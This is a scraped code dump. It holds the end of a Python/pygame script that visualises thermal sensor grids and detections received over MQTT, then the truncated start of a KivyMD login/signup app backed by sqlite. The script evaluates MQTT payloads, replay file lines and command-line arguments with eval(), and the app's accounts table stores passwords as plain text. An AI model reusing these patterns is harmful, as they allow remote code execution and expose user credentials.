last_detections = {}\n last_detections_local = {}\n world_detections = []\n objects = {}\n\n for ad in sensors:\n matrices[ad] = zero_matrix\n last_detections[ad] = []\n last_detections_local[ad] = []\n\n real_time_delta = 0\n epoch = 0\n det_time = 0\n last_time = time.time()\n flag = None\n buffer = []\n\n yeehaw = False\n qt1 = time.time()\n qt_last = 0\n\n running = True\n if display != \"none\":\n if not live:\n _thread.start_new_thread(stream_text_data, (text, wiwide, fps, sensors, start_time,\n addresses, det_path, det_text, det_start_idx, post,\n end_time, post_path_out))\n while running:\n for event in pygame.event.get():\n # QUIT\n if event.type == pygame.QUIT:\n running = False\n # ESC: quit this scene\n if event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:\n running = False\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n pos = pygame.mouse.get_pos()\n x = pos[0] / meterX\n y = ((aspect[1] - pos[1]) / meterY)\n \"\"\"if display == 'overlay' and y > 0:\n print(\"Pixels: \", pos)\n print(\"Meters: \", (x, y))\"\"\"\n\n if event.type == pygame.USEREVENT and not live:\n if event.user_type == pygame_gui.UI_HORIZONTAL_SLIDER_MOVED:\n # print(event.ui_element, playback)\n if event.ui_element == playback:\n text_line = int(len(text) * playback.get_current_value())\n playback.update(0.0001)\n # print(playback.get_current_value())\n if not live: manager.process_events(event)\n if not live: manager.update(1/fps)\n\n while len(data_queue) > 0:\n mqtt_packet_list = data_queue.popleft()\n for mqtt_packet in mqtt_packet_list:\n if (not wiwide or replaying) and \"fields\" in mqtt_packet.keys():\n utc = mqtt_packet['fields']['utcSecs']\n if not replaying:\n if real_time_delta == 0:\n real_time_delta = mqtt_packet['timestamp'] / 1000 - mqtt_packet['fields']['utcSecs']\n data = mqtt_packet['fields']['data'][6:]\n else:\n if real_time_delta == 0 and use_delta:\n real_time_delta = mqtt_packet['timestamp'] / 1000000 - mqtt_packet['fields']['utcSecs']\n epoch /= 1000\n data = mqtt_packet['fields']['data']\n id = mqtt_packet['fields']['macAddress']\n epoch = utc + real_time_delta\n elif wiwide:\n epoch = mqtt_packet['timestamp']\n id = mqtt_packet['deviceName']\n data = mqtt_packet['data']\n if \"flag\" in mqtt_packet.keys():\n flag = mqtt_packet['flag']\n\n data = [min(max(x, lo * 4), hi * 4) for x in data]\n if replaying: data = data[6:]\n if seamless or verizon or replaying:\n data = data[:-2]\n if len(data) != 64:\n print(f\"improper data length: {len(data)} != 64\")\n raise Exception\n data = np.asarray(data).reshape((8, 8)) * 0.25\n sensor = None\n for s in sensors:\n if addresses[s] == id:\n sensor = s\n if sensor is None: continue\n matrices[sensor] = np.array(data).T\n last_detections[sensor] = []\n last_detections_local[sensor] = []\n world_detections = []\n\n while len(detection_queue) > 0:\n skip = False\n detect_packet_list = detection_queue.popleft()\n for detect_packet in detect_packet_list:\n if not wiwide:\n det_time = detect_packet['utcSecs'] + real_time_delta\n else:\n det_time = detect_packet['timestamp']\n if replaying: det_time = detect_packet[\"timestamp\"] / 1000\n det_name = detect_packet['deviceName']\n det_local = detect_packet['detectionsLocal']\n det_world = detect_packet['detectionsWorld']\n\n sensor = None\n if not skip:\n for s in sensors:\n if addresses[s] == det_name:\n sensor = s\n if sensor is None: continue\n last_detections_local[sensor] = det_local\n last_detections[sensor] = det_world\n if 'detectionsWorld' in detect_packet.keys():\n world_detections.extend(detect_packet['detectionsWorld'])\n\n if len(traj_queue) > 0:\n in_n_out = {}\n trajectory = traj_queue.popleft()\n try:\n traj_stamp = trajectory['deviceName']\n trajectory_tracking = trajectory['timestamp']\n traj_str = \"trajectory\"\n in_n_out[traj_stamp] = (trajectory['in'], trajectory['out'])\n # print(datetime.fromtimestamp(trajectory_tracking / 1000000))\n except KeyError:\n traj_stamp = trajectory['DeviceName']\n trajectory_tracking = trajectory['Time']\n traj_str = \"Trajectory\"\n last_traj_sensor = f\"(Sensor ID: {traj_stamp})\"\n if traj_stamp not in trajectories.keys(): trajectories[traj_stamp] = []\n trajectories[traj_stamp].extend(trajectory[traj_str])\n traj_times[traj_stamp] = 0\n delete_times = []\n for s, t in traj_times.items():\n if t < 20:\n traj_times[s] += 1\n else:\n delete_times.append(s)\n for d in delete_times:\n del traj_times[d]\n del trajectories[d]\n\n while len(post_queue) > 0:\n objects_msg = post_queue.popleft()\n objects = {n: o for n, o in zip(objects_msg['detectionIDs'], objects_msg['detectionsWorld'])}\n ids = objects_msg['detectionIDs']\n\n qt2 = time.time()\n if int(qt2 - qt1) % 60 == 0 and not yeehaw: # Ignore this variable name. I was having fun.\n print(f\"Length of post queue at {datetime.fromtimestamp(qt2)}: {len(post_queue)}\")\n yeehaw = True\n qt_last = qt2\n if (time.time()) - qt_last > 10: yeehaw = False\n # det_time = objects_msg['timestamp'] / 1000\n # print(len(post_queue))\n\n if display == 'overlay':\n world_cd_surf = pygame.Surface(aspect, pygame.SRCALPHA, 32)\n world_cd_surf = world_cd_surf.convert_alpha()\n if show_graph:\n with open(graph_path, \"r\") as f:\n graph = json.load(f)\n with open(config_json_path, \"r\") as f:\n cf = json.load(f)\n walls = cf['coordinates'][0]['walls']\n for wall in walls:\n pt0 = [wall[0][0] * meterX, aspect_ratio[1] - (wall[0][1] * meterY)]\n pt1 = [wall[1][0] * meterX, aspect_ratio[1] - (wall[1][1] * meterY)]\n # print(pt0, pt1)\n pygame.draw.line(world_cd_surf, black, pt0, pt1, 1)\n for name, v in graph.items():\n node = v[0]\n pos = node['position']\n nbs = node['neighbors']\n pygame.draw.circle(world_cd_surf, black, (pos[0] * meterX, pos[1] * meterY), 2, width=0)\n for n in nbs:\n nb_pos = graph[str(n[0])][0]['position']\n pygame.draw.line(world_cd_surf, red, (pos[0] * meterX, aspect_ratio[1] - pos[1] * meterY),\n (nb_pos[0] * meterX, aspect_ratio[1] - nb_pos[1] * meterY), 1)\n\n disp.blit(world_cd_surf, (0, 0))\n\n assert floorplan is not None, \"A floor plan image file must be provided for the overlay visualization mode.\"\n\n for pt in exit_points:\n cd0 = int(pt[0] * meterX)\n cd1 = aspect_ratio[1] - int(pt[1] * meterY)\n pygame.draw.circle(world_cd_surf, black, (cd0, cd1), 8, width=1)\n img = pygame.image.load(floorplan)\n img = pygame.transform.scale(img, aspect)\n disp.blit(img, (0, 0))\n texts = {}\n for sensor, data in matrices.items():\n data = np.clip(data, lo + 0.01, hi - 0.01).copy()\n surf = pygame.surfarray.make_surface(gray(data, lo, hi))\n surf = pygame.transform.scale(surf, sizes[sensor])\n if objects:\n # print(objects)\n for pair in objects.values():\n cd0 = int((pair[0]) * meterX)\n cd1 = aspect_ratio[1] - int((pair[1]) * meterY)\n pygame.draw.circle(world_cd_surf, (0, 0, 255), (cd0, cd1), 10, width=1)\n if show_raw_detections:\n if show_det_local:\n for loc in last_detections_local[sensor]:\n cd0 = int(loc[0] * 7 * (sizes[sensor][0] / 8))\n cd1 = int(loc[1] * 7 * (sizes[sensor][1] / 8))\n pygame.draw.circle(surf, (255, 255, 0), (cd0, cd1), 10, width=1)\n for det in last_detections[sensor]:\n cd0 = int(det[0] * meterX)\n cd1 = aspect_ratio[1] - int(det[1] * meterY)\n pygame.draw.circle(world_cd_surf, red, (cd0, cd1), 8, width=1)\n surf = pygame.transform.rotate(surf, rotations[sensor])\n disp.blit(surf, positions[sensor])\n disp.blit(world_cd_surf, (0, 0))\n\n if post:\n obs = font.render(\"OBJECTS:\", True, black)\n obRect = obs.get_rect()\n obRect.topleft = (0, int(64 * scaleX))\n disp.blit(obs, obRect)\n start = 80\n gap = 20\n for k in range(len(objects)):\n cds = list(objects.values())[k]\n cd0 = np.around(cds[0], 2)\n cd1 = np.around(cds[1], 2)\n place = start + (k * gap)\n texts[k] = font.render(f\"Name: {ids[k]}, Coordinates: {(cd0, cd1)}\",\n True, black)\n textRect = texts[k].get_rect()\n textRect.topleft = (0, place * scaleX)\n disp.blit(texts[k], textRect)\n\n for text in texts.values(): text.fill(white)\n # plot last massage time\n if not replaying:\n nt = epoch\n else:\n nt = epoch * 1000\n try:\n stamp = datetime.fromtimestamp(nt)\n except ValueError:\n stamp = datetime.fromtimestamp(epoch)\n text0 = font.render(f'data time (GMT): {stamp}', True, black)\n textRect = text0.get_rect()\n textRect.topleft = (0, int(10 * scaleY))\n disp.blit(text0, textRect)\n\n # plot current time\n stamp = datetime.fromtimestamp(time.time())\n text1 = font.render(f'current time (GMT): {stamp}', True, black)\n textRect = text1.get_rect()\n textRect.topleft = (0, int(37 * scaleY))\n disp.blit(text1, textRect)\n\n # Plot last message time\n stamp = datetime.fromtimestamp(det_time)\n text2 = font.render(f'last detection time (GMT): {stamp}', True, black)\n textRect = text2.get_rect()\n textRect.topright = (aspect[0], int(10 * scaleY))\n disp.blit(text2, textRect)\n\n elif display == 'grid':\n transparent_surface = pygame.Surface(aspect, pygame.SRCALPHA, 32)\n transparent_surface = transparent_surface.convert_alpha()\n if post: warnings.warn(\"Post-processed detections will not be shown in the grid visualization mode\")\n if not trajectories: disp.fill(black)\n for idx, tup in enumerate(matrices.items()):\n deviceName = tup[0]\n name = deviceName\n data = tup[1]\n surf = pygame.surfarray.make_surface(gray(data, lo, hi))\n\n surf = pygame.transform.scale(surf, (box, box))\n if verizon: surf = pygame.transform.rotate(surf, rotation)\n x = box * (idx % grid_dimensions[0])\n y = box * (idx // grid_dimensions[0])\n\n pygame.draw.rect(transparent_surface, black, (x, y, box, box), width=1)\n if type(deviceName) is int: name = addresses[deviceName]\n text1 = font.render(f'{name}', True, black)\n textRect = text1.get_rect()\n textRect.topleft = (x + 3, y + 3)\n\n for cd in last_detections[deviceName]:\n cd0 = int(cd[0] * 7 * (grid_dimensions[2] / 8))\n cd1 = int(cd[1] * 7 * (grid_dimensions[2] / 8))\n pygame.draw.circle(surf, red, (cd0, cd1), box // 10, width=1)\n # pygame.draw.circle(surf, red, cd, box // 10, width=1)\n\n disp.blit(surf, (x, y))\n disp.blit(text1, textRect)\n\n if flag is not None:\n flag_text = font.render(f\"Flag: {flag}\", True, black)\n flagRect = flag_text.get_rect()\n flagRect.topleft = (x + 3, y + 3 + font_size)\n disp.blit(flag_text, flagRect)\n\n if trajectories:\n for k, traj in trajectories.items():\n color = [0, 0, 0]\n if in_n_out[k][0]:\n color[0] += 255\n if in_n_out[k][1]:\n color[2] += 255\n color = tuple(color)\n try:\n key = [idx for idx, x in enumerate(addresses.keys()) if addresses[x] == k][0]\n except IndexError:\n continue\n move_y = key // grid_dimensions[0]\n move_x = key % grid_dimensions[0]\n for j in range(len(traj)):\n trajectory = traj[j]\n for i in range(len(trajectory) - 1):\n p0 = (trajectory[i][0] * box + (box * move_x),\n trajectory[i][1] * box + (box * move_y))\n p1 = (trajectory[i + 1][0] * box + (box * move_x),\n trajectory[i + 1][1] * box + (box * move_y))\n pygame.draw.circle(transparent_surface, color, p0, 4, width=0)\n pygame.draw.line(transparent_surface, color, p0, p1, width=1)\n if i == len(trajectory) - 1:\n pygame.draw.circle(transparent_surface, color, p1, 4, width=0)\n\n disp.blit(transparent_surface, (0, 0))\n if wiwide:\n try:\n trajectory_tracking = datetime.fromtimestamp(int(trajectory_tracking) / 1000000)\n except:\n pass\n traj_text = font.render(f\"Last Trajectory: {trajectory_tracking} {last_traj_sensor}\",\n True, white, black)\n traj_rect = traj_text.get_rect()\n traj_rect.topleft = (0, height + 5)\n disp.blit(traj_text, traj_rect)\n\n data_time_text = font.render(f\"Data Time: {datetime.fromtimestamp(epoch)}\", True, white, black)\n dt_rect = data_time_text.get_rect()\n dt_rect.topleft = (0, height + 5 + font_size)\n\n disp.blit(data_time_text, dt_rect)\n\n if not live:\n manager.draw_ui(disp)\n current_pos = playback.get_current_value()\n if current_pos == 1: exit(0)\n pygame.display.update()\n\n clock.tick(100)\n time.sleep(0.001)\n\n\ndef stream_text_data(text, wiwide, fps, sensors, start_time,\n addresses, det_path, det_text, det_start_idx,\n post, end_time, post_path_out):\n global playback\n global text_line\n global data_queue\n last_time = time.time()\n buffer = []\n while True:\n time_check = time.time()\n if text[text_line][0] == \"b\": text[text_line] = text[text_line][1:]\n line_check = eval(text[text_line])\n if type(line_check) is not dict: line_check = ast.literal_eval(line_check)\n if not wiwide and line_check['name'] == \"notifData\":\n realtime = line_check['timestamp']\n timestamp = line_check['fields']['utcSecs']\n id = line_check['fields']['macAddress']\n elif wiwide:\n timestamp = line_check['timestamp']\n realtime = timestamp\n id = line_check['deviceName']\n else:\n text_line += 1\n continue\n sensor = None\n playback.set_current_value(text_line / len(text))\n playback.update(1 / fps)\n if realtime >= start_time:\n if time_check - last_time >= 1 / (4 * fps * len(sensors)):\n last_time = time_check\n if len(buffer) > 1:\n data_queue.append(buffer)\n buffer = []\n\n for s in sensors:\n if addresses[s] == id:\n sensor = s\n buffer.append(line_check)\n if det_path and sensor is not None:\n for t in range(det_start_idx[sensor], len(det_text)):\n packet = ast.literal_eval(det_text[t])\n if wiwide:\n time_unit = 'timestamp'\n else:\n time_unit = 'utcSecs'\n if packet['deviceName'] == id and packet[time_unit] == timestamp:\n if post: detection_queue1.append(packet)\n detection_queue.append([packet])\n det_start_idx[sensor] = t\n elif packet[time_unit] > timestamp:\n break\n elif realtime >= end_time:\n raise\n text_line += 1\n\n if post and os.path.exists(post_path_out):\n with open(post_path_out, \"r\") as post_file:\n post_text = post_file.readlines()\n for line in post_text:\n post_packet = eval(line)\n post_timestamp = post_packet['timestamp']\n if post_timestamp == timestamp:\n post_queue.append(post_packet)\n time.sleep(1 / (10*(fps * len(sensors))))\n\n\ndef _sizes_positions(config, meterX, meterY, aspect):\n cfg = config['sensors']\n positions = {}\n sizes = {}\n rotations = {}\n for sensor_dict in cfg:\n label = sensor_dict['label']\n\n center = sensor_dict['center']\n c0 = (center[0]) * meterX\n c1 = aspect[1] - ((center[1]) * meterY)\n\n dims = sensor_dict['coverage_dim']\n d0 = dims[0] * meterX\n d1 = dims[1] * meterY\n\n sizes[label] = (int(d0), int(d1))\n positions[label] = (int(c0 - (d0 / 2)), int(c1 - (d1 / 2)))\n try:\n rotations[label] = sensor_dict['rotation']\n except KeyError:\n rotations[label] = 0\n return sizes, positions, rotations\n\n\ndef mqtt_processes(address, topic_raw_in, topic_detect_in, traj_topic, topic_post_in, usn, pw):\n global data_queue\n global detection_queue\n global traj_queue\n global post_queue\n global client\n global bufferMQ\n global sensor_timer\n global det_buffer\n global in_count\n global out_count\n in_count = 0\n out_count = 0\n bufferMQ = []\n det_buffer = []\n sensor_timer = \"\"\n\n def on_subscribe(client, userdata, mid, granted_qos):\n print(\"Subscribed: \" + str(mid) + \" \" + str(granted_qos))\n\n def on_message(client, userdata, msg):\n global bufferMQ\n global sensor_timer\n global det_buffer\n global in_count\n global out_count\n try:\n # message = json.loads(msg.payload)\n message = eval(msg.payload)\n\n # GENERAL CONDITION\n if list(message.keys())[0] == 'fields':\n if message['name'] == 'notifData':\n bufferMQ.append(message)\n # print(\"BUFFER:\", len(bufferMQ))\n if not sensor_timer:\n sensor_timer = message['fields']['macAddress']\n if message['fields']['macAddress'] == sensor_timer or len(bufferMQ) > 1:\n data_queue.append(bufferMQ)\n # print(\"QUEUE:\", len(data_queue))\n bufferMQ = []\n # WIWIDE CONDITION\n if list(message.keys())[0] == \"flag\":\n data_queue.append([message])\n\n elif \"lostIDs\" in message.keys():\n # print(\"post detection\")\n post_queue.append(message)\n\n elif any([x in message.keys() for x in ['deviceName', 'DeviceName', 'detectionsLocal']]):\n if any([p in message.keys() for p in ['trajectory', \"Trajectory\"]]):\n traj_queue.append(message)\n in_count += message['in']\n out_count += message['out']\n print(f\"TOTAL IN: {in_count} \\nTOTAL OUT: {out_count}\\n\")\n else:\n if len(message['detectionsLocal']) > 0:\n detection_queue.append([message])\n detection_queue1.append([message])\n\n except Exception as e:\n print('\\n========================================================================')\n exc_type, exc_obj, exc_tb = sys.exc_info()\n print('Error type: {}, happened on line {} in '.format(exc_type, exc_tb.tb_lineno))\n print('Error: {}'.format(e))\n print('========================================================================\\n')\n\n client.username_pw_set(usn, pw)\n client.on_subscribe = on_subscribe\n client.on_message = on_message\n client.connect(address, 1883)\n client.subscribe(topic_raw_in, qos=1)\n if topic_detect_in: client.subscribe(topic_detect_in, qos=1)\n if traj_topic: client.subscribe(traj_topic, qos=1)\n if topic_post_in: client.subscribe(topic_post_in, qos=1)\n client.loop_forever()\n\n\ndef sensor_count(path):\n sensor_ids = []\n with open(path, 'r') as f:\n text = f.readlines()\n for i in range(len(text)):\n try:\n if text[i][0] == \"b\": text[i] = text[i][1:]\n input_dict = ast.literal_eval(text[i])\n if type(input_dict) is not dict: input_dict = ast.literal_eval(input_dict)\n if \"fields\" in input_dict.keys():\n name = input_dict['fields']['macAddress']\n else:\n name = input_dict['deviceName']\n if name not in sensor_ids:\n sensor_ids.append(name)\n except Exception as e:\n print(e)\n continue\n return sensor_ids\n\n\ndef separate_sensors(path, sensor_ids):\n sections = {}\n with open(path, 'r') as f:\n text = f.readlines()\n\n for line in text:\n d = ast.literal_eval(line)\n name = d['deviceName']\n if name not in sections.keys():\n sections[name] = []\n sections[name].append(line)\n\n paths = {}\n for sensor in sensor_ids:\n with open(path[:-4] + '_' + sensor + \".txt\", 'w') as f:\n f.writelines(sections[sensor])\n paths[sensor] = path[:-4] + '_' + sensor + \".txt\"\n return paths\n\n\ndef data_converter(inputfile: str, outputfile: str):\n with open(inputfile, 'r') as f:\n lines = f.readlines()\n with open(outputfile, 'w') as f:\n for line in lines:\n if line[0] == \"b\": line = line[1:]\n line = ast.literal_eval(line)\n if type(line) is not str:\n line = str(line)\n data: dict = eval(line)\n fields: dict | int = data.get('fields', 0)\n if fields != 0:\n data_inside = fields.get('data', 0)\n if data_inside != 0:\n json.dump({'data': data_inside[6:70],\n 'deviceName': fields['macAddress'],\n 'thermistor': int.from_bytes(data_inside[4:6], 'little'),\n 'timestamp': data['timestamp'],\n 'utcUsecs': data['fields']['utcUsecs'],\n 'utcSecs': data['fields']['utcSecs']}, f)\n f.write('\\n')\n\n\ndef gray(im, lo, hi):\n lo_pot = np.percentile(im, 2) - 3\n hi_pot = np.percentile(im, 99) + 7\n if lo_pot < lo:\n lo = lo_pot\n if hi_pot > hi:\n hi = hi_pot\n im = ((255 / (hi - lo)) * im) - lo\n w, h = im.shape\n ret = np.empty((w, h, 3), dtype=np.uint8)\n ret[:, :, 2] = ret[:, :, 1] = ret[:, :, 0] = im\n return ret\n\n\ndef bw(surf, arr):\n width, height = surf.get_size()\n for i in range(width):\n for j in range(height):\n if arr[i, j]:\n surf.set_at((i, j), (255, 255, 255))\n return surf\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-config\", default=\"\")\n parser.add_argument(\"-fp\", default=\"\")\n\n parser.add_argument(\"-ad\", default=\"None\")\n parser.add_argument(\"-live\", default=\"f\")\n\n parser.add_argument(\"-disp\", default=\"grid\")\n parser.add_argument(\"-ar\", default=\"(1000, 1000)\")\n parser.add_argument(\"-gd\", default=\"None\")\n parser.add_argument(\"-fps\", default=\"10\")\n parser.add_argument(\"-start\", default=\"0\")\n parser.add_argument(\"-end\", default=\"np.inf\")\n\n parser.add_argument(\"-data\", default=\"\")\n parser.add_argument(\"-det\", default=\"\")\n parser.add_argument(\"-post\", default=\"f\")\n parser.add_argument(\"-cvt\", default=\"f\")\n\n parser.add_argument(\"-shgr\", default=\"f\")\n parser.add_argument(\"-gp\", default=\"\")\n\n parser.add_argument('-mqad', default=\"\")\n parser.add_argument('-mqus', default=\"\")\n parser.add_argument('-mqpw', default=\"\")\n parser.add_argument('-mqri', default=\"\")\n parser.add_argument('-mqop', default=\"\")\n parser.add_argument('-mqdi', default=\"\")\n parser.add_argument('-mqdo', default=\"\")\n\n parser.add_argument(\"-rp\", default=\"f\")\n parser.add_argument(\"-rot\", default=\"0\")\n parser.add_argument(\"-srd\", default=\"t\")\n\n parser.add_argument(\"-sld\", default=\"f\")\n parser.add_argument(\"-delta\", default=\"t\")\n\n args = parser.parse_args()\n\n global show_det_local\n global use_delta\n use_delta = args.delta == \"t\"\n show_det_local = args.sld == \"t\"\n\n config = args.config\n floorplan = args.fp\n\n address_dict = eval(args.ad)\n live = (args.live == \"t\")\n\n disp = args.disp\n aspect = eval(args.ar)\n grid_dims = eval(args.gd)\n fps = eval(args.fps)\n start = eval(args.start)\n end = eval(args.end)\n\n data_path = args.data\n det_path = args.det\n post = (args.post == \"t\")\n convert = args.cvt\n\n show_graph = args.shgr == \"t\"\n graph_path = args.gp\n\n replay = args.rp == \"t\"\n rotation = eval(args.rot)\n srd = args.srd == \"t\"\n\n mqad = args.mqad\n mqus = args.mqus\n mqpw = args.mqpw\n mqri = args.mqri\n mqdi = args.mqdi\n mqdo = args.mqdo\n mqop = args.mqop\n\n analyze(config_json_path=config, floorplan=floorplan, address_dict=address_dict, live=live, start_time=start,\n end_time=end, display=disp, aspect_ratio=aspect, grid_dimensions=grid_dims, data_path=data_path, fps=fps,\n replaying=replay, det_path=det_path, post=post, convert=convert, mqtt_address=mqad, show_graph=show_graph,\n graph_path=graph_path, mqtt_usn=mqus, mqtt_pwd=mqpw, mqtt_in=mqri, rotation=rotation,\n mqtt_detections_in=mqdi, mqtt_detections_out=mqdo, mqtt_out=mqop, show_raw_detections=srd)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"SidharthAnand/visualization","sub_path":"archive/analysis_general.py","file_name":"analysis_general.py","file_ext":"py","file_size_in_byte":39895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"72510829482","text":"from kivymd.app import MDApp\r\nfrom kivy.uix.button import Button\r\nfrom kivymd.uix.button import MDFlatButton\r\nfrom kivy.uix.screenmanager import Screen, ScreenManager\r\nfrom kivymd.uix.screen import MDScreen\r\nfrom kivy.clock import Clock\r\nfrom kivy.uix.widget import Widget\r\nfrom kivymd.uix.dialog import MDDialog\r\nfrom kivy.uix.textinput import TextInput\r\nfrom kivy.config import Config\r\nfrom kivymd.uix.label import MDLabel\r\nfrom kivy.core.window import Window\r\nfrom kivy.lang import Builder\r\nimport sqlite3\r\nfrom kivymd.uix.datatables import MDDataTable\r\nfrom kivy.metrics import dp\r\nfrom plyer import filechooser\r\nfrom kivy.uix.anchorlayout import AnchorLayout\r\n\r\ns = \"\"\"\r\nScreenManager:\r\n MenuScreen:\r\n ProfileScreen:\r\n UploadScreen:\r\n LoginScreen:\r\n SignupScreen:\r\n ClientsTable:\r\n firstpage:\r\n:\r\n name: 'menu'\r\n MDRectangleFlatButton:\r\n text: 'Profile'\r\n pos_hint: {'center_x':0.5,'center_y':0.6}\r\n on_press: root.manager.current = 'new'\r\n MDRectangleFlatButton:\r\n text: 'Upload'\r\n pos_hint: {'center_x':0.5,'center_y':0.5}\r\n on_press: root.manager.current = 'Clientstable'\r\n MDRectangleFlatButton:\r\n text: 'backlogin'\r\n pos_hint: {'center_x':0.5,'center_y':0.4}\r\n on_press: root.manager.current = 'login'\r\n:\r\n name: 'profile'\r\n MDLabel:\r\n text: 'Profile'\r\n halign: 'center'\r\n MDRectangleFlatButton:\r\n text: 'Back'\r\n pos_hint: {'center_x':0.5,'center_y':0.1}\r\n on_press: root.manager.current = 'menu' \r\n:\r\n name: 'upload'\r\n BoxLayout:\r\n orientation: 'vertical'\r\n MDToolbar:\r\n title: 'Entered'\r\n left_action_items: [[\"menu\", lambda x: app.navigation_draw()]]\r\n right_action_items: [[\"dots-vertical\", lambda x: app.callback()], [\"clock\", lambda x: app.callback_2()]]\r\n elevation:5\r\n\r\n MDLabel:\r\n text: 'hello world'\r\n halign: 'center'\r\n MDBottomAppBar:\r\n MDToolbar:\r\n title: 'Demo'\r\n icon: 'language-python'\r\n type: 'bottom'\r\n left_action_items: [[\"coffee\", lambda x: app.navigation_draw()]]\r\n on_action_button: root.manager.current = 'menu' \r\n\r\n\r\n\r\n:\r\n name:\"login\"\r\n MDFloatLayout:\r\n\r\n MDTextField:\r\n id:email\r\n hint_text: \"Enter username\"\r\n helper_text: \"or click on forgot username\"\r\n helper_text_mode: \"on_focus\"\r\n icon_right: \"android\"\r\n icon_right_color: app.theme_cls.primary_color\r\n pos_hint:{'center_x': 0.5, 'center_y': 0.7}\r\n size_hint_x:None\r\n width:300\r\n\r\n MDTextField:\r\n id:password\r\n hint_text: \"Enter password\"\r\n helper_text: \"or click on forgot password\"\r\n helper_text_mode: \"on_focus\"\r\n icon_right: \"lock\"\r\n icon_right_color: app.theme_cls.primary_color\r\n pos_hint:{'center_x': 0.5, 'center_y': 0.58}\r\n size_hint_x:None\r\n width:300\r\n MDRaisedButton:\r\n text:\"LOGIN\"\r\n pos_hint:{'center_x': 0.6, 'center_y': 0.5}\r\n md_bg_color: 1, 0, 1, 1\r\n on_press:app.log()\r\n MDRaisedButton:\r\n text:\"SIGNUP\"\r\n pos_hint:{'center_x': 0.4, 'center_y': 0.5}\r\n md_bg_color: 1, 0, 1, 1\r\n on_press:root.manager.current = 'signup' \r\n:\r\n name: 'signup'\r\n MDFloatLayout:\r\n\r\n MDTextField:\r\n id:email\r\n hint_text: \"Enter username\"\r\n helper_text: \"or click on forgot username\"\r\n helper_text_mode: \"on_focus\"\r\n icon_right: \"android\"\r\n icon_right_color: app.theme_cls.primary_color\r\n pos_hint:{'center_x': 0.5, 'center_y': 0.7}\r\n size_hint_x:None\r\n width:300\r\n\r\n MDTextField:\r\n id:password\r\n hint_text: \"Enter password\"\r\n helper_text: \"or click on forgot password\"\r\n helper_text_mode: \"on_focus\"\r\n icon_right: \"lock\"\r\n icon_right_color: app.theme_cls.primary_color\r\n pos_hint:{'center_x': 0.5, 'center_y': 0.58}\r\n size_hint_x:None\r\n width:300\r\n MDRaisedButton:\r\n text:\"SIGNUP\"\r\n pos_hint:{'center_x': 0.6, 'center_y': 0.5}\r\n md_bg_color: 1, 0, 1, 1\r\n on_press:app.create() \r\n MDRaisedButton:\r\n text: 'Backlogin'\r\n pos_hint: {'center_x':0.4,'center_y':0.5}\r\n md_bg_color: 1, 0, 1, 1\r\n on_press: root.manager.current = 'login'\r\n:\r\n name:'new'\r\n \r\n MDBoxLayout:\r\n id: main_layout\r\n orientation: 'vertical'\r\n padding: dp(20)\r\n\r\n MDLabel:\r\n text: \"Records Manager\"\r\n font_size: dp(20)\r\n halign: 'center'\r\n padding_y: dp(20)\r\n size_hint_y: None\r\n height: self.texture_size[1]\r\n\r\n MDGridLayout:\r\n adaptive_height: True\r\n cols: 2\r\n MDBoxLayout:\r\n MDLabel:\r\n text: \"Record Id\"\r\n MDLabel:\r\n id: record_id\r\n text: ''\r\n Widget:\r\n\r\n MDTextField:\r\n id: matter_name\r\n hint_text: \"Matter Name\"\r\n\r\n MDTextField:\r\n id: file_name\r\n hint_text: \"File name\"\r\n\r\n MDTextField:\r\n id: description\r\n hint_text: \"Description\"\r\n\r\n MDTextField:\r\n id: location\r\n hint_text: \"Location\"\r\n\r\n MDBoxLayout:\r\n adaptive_height: True\r\n spacing: dp(50)\r\n padding: dp(20)\r\n\r\n MDRectangleFlatButton:\r\n text: \"Clear Form\"\r\n on_press: app.clear_form()\r\n\r\n MDRectangleFlatButton:\r\n text: \"Add Record\"\r\n on_press: app.add_record()\r\n\r\n MDRectangleFlatButton:\r\n text: \"Update Record\"\r\n on_press: app.update_record()\r\n\r\n MDRectangleFlatButton:\r\n text: \"Delete Record\"\r\n on_press:root.manager.current = 'Clientstable' \r\n\r\n\r\n:\r\n name: 'Clientstable'\r\n\r\n\r\n\r\n \"\"\"\r\nLO = '''\r\nMDScreen:\r\n name:\"pre\"\r\n MDFloatLayout:\r\n md_bg_color: 115/255.0, 62/255.0, 198/255.0, 1\r\n MDLabel:\r\n text:\"Welcome\"\r\n pos_hint:{\"center_x\": .5, \"center_y\": .2}\r\n halign:\"center\"\r\n theme_text_color:\"Custom\"\r\n text_color: 1, 1, 1, 1\r\n font_size:\"35sp\"\r\n MDLabel:\r\n text:\"App by santhoshkumar\"\r\n pos_hint:{\"center_x\": .5, \"center_y\": .15}\r\n halign:\"center\"\r\n theme_text_color:\"Custom\"\r\n text_color: 1, 1, 1, 1\r\n font_size:\"14sp\"\r\n\r\n '''\r\n\r\n\r\nclass ClientsTable(Screen):\r\n def load_table(self):\r\n layout = AnchorLayout()\r\n self.data_tables = MDDataTable(\r\n pos_hint={'center_y': 0.5, 'center_x': 0.5},\r\n size_hint=(0.9, 0.6),\r\n use_pagination=True,\r\n check=True,\r\n column_data=[\r\n (\"No.\", dp(30)),\r\n (\"Head 1\", dp(30)),\r\n (\"Head 2\", dp(30)),\r\n (\"Head 3\", dp(30)),\r\n (\"Head 4\", dp(30)), ],\r\n row_data=[\r\n (f\"{i + 1}\", \"\", \"\", \"\", \"\")\r\n for i in range(50)], )\r\n self.add_widget(self.data_tables)\r\n return layout\r\n\r\n def on_enter(self):\r\n self.load_table()\r\n\r\n\r\nclass MenuScreen(Screen):\r\n pass\r\n\r\n\r\nclass ProfileScreen(Screen):\r\n pass\r\n\r\n\r\nclass UploadScreen(Screen):\r\n pass\r\n\r\n\r\nclass firstpage(Screen):\r\n pass\r\n\r\n\r\nclass LoginScreen(MDScreen):\r\n pass\r\n\r\n\r\nclass SignupScreen(Screen):\r\n pass\r\n\r\n\r\nclass MainApp(MDApp):\r\n\r\n def build(self):\r\n global scr\r\n scr = ScreenManager()\r\n Builder.load_string(s)\r\n conn = sqlite3.connect(\"accounts.db\")\r\n c = conn.cursor()\r\n\r\n c.execute('''CREATE TABLE if not exists accounts \r\n \t\t(uname text, pwd text)''')\r\n conn.commit()\r\n conn.close()\r\n self.theme_cls.primary_palette = \"Orange\"\r\n scr.add_widget((Builder.load_string(LO)))\r\n\r\n scr.add_widget((Builder.load_string(LO)))\r\n 